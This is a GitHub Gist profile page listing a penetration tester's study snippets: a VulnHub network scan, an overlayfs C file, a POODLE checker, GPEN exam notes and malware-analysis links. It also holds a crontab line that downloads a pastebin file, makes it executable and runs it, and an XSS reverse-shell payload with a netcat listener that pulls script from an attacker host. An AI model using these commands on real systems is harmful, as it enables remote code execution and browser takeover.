Skip to content

Instantly share code, notes, and snippets.

View setrus's full-sized avatar
😉
I may be slow to respond.

setrus setrus

😉
I may be slow to respond.
View GitHub Profile
@setrus
setrus / plunk @ VulnHub
Created December 18, 2017 13:47
plunk @ VulnHub
Discovering Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
root@setrus:~# netdiscover -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
@setrus
setrus / overlayfs.c
Last active January 19, 2018 19:01
overlayfs
#include <stdio.h>
#include <sched.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
@setrus
setrus / crontab remote
Last active February 12, 2018 13:18
Crontab
51 14 * * * wget -O /tmp/command https://pastebin.com/raw/1Ru7ms7t && chmod +x /tmp/command && /tmp/command
@setrus
setrus / PoodleCheck.sh
Last active October 11, 2018 05:48
PoodleCheck
#!/bin/bash
# This script is just a small checker for hosts that may be vulnerable to POODLE.
# It tests all the hosts in the file "target_file.txt".
# Needed :
# 1) target_file.txt - with the ips to test
# 2) scan_result_utp.txt - list of the open ports for that host
# [@setrus == setrus@null.net]
# Poodle Testing for ALL the open ports of the hosts
# Must be run in the same file as target_file.txt
@setrus
setrus / Index
Created February 28, 2019 15:20
Index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/1288690
-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
@setrus
setrus / GPEN Knowledge
Last active April 25, 2019 13:33
GPEN
Exam Certification Objectives and Outcome Statements
1. Advanced Password Attacks
- The candidate will be able to user additional methods to attack password hashes and authenticate
2. Attacing Password hashes
- The candidate will be able to obtain and attack passwords hashes and other password representations
3. Escalation and Exploitation
- The candidate will be able to demonstrate the fundamental conepts of exploitation, data exfiltratrion from compromised hosts and pivoting to exploit other hosts within a target network.
@setrus
setrus / gist:16d40c503d2181d072eb95d4f6fac338
Created September 28, 2019 04:05
PwnThyBytes Opimal CTF experience
SageMath
WinDbg Preview
Doker
GNU Radio
@setrus
setrus / Malware Analysis
Created November 1, 2019 11:34
Information on Malware analysis
https://www.sans.org/reading-room/whitepapers/threats/malware-analysis-environment-design-artitecture-1841
https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html
https://oalabs.openanalysis.net/2018/07/16/oalabs_malware_analysis_virtual_machine/
@setrus
setrus / hpb3_links.txt
Created November 4, 2019 09:03 — forked from audibleblink/hpb3_links.txt
All links from Hacker Playbook 3, with bit.ly links unfurled
@setrus
setrus / xss_shell.txt
Created November 5, 2019 14:39 — forked from ivanvza/xss_shell.txt
XSS Reverse Shell
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>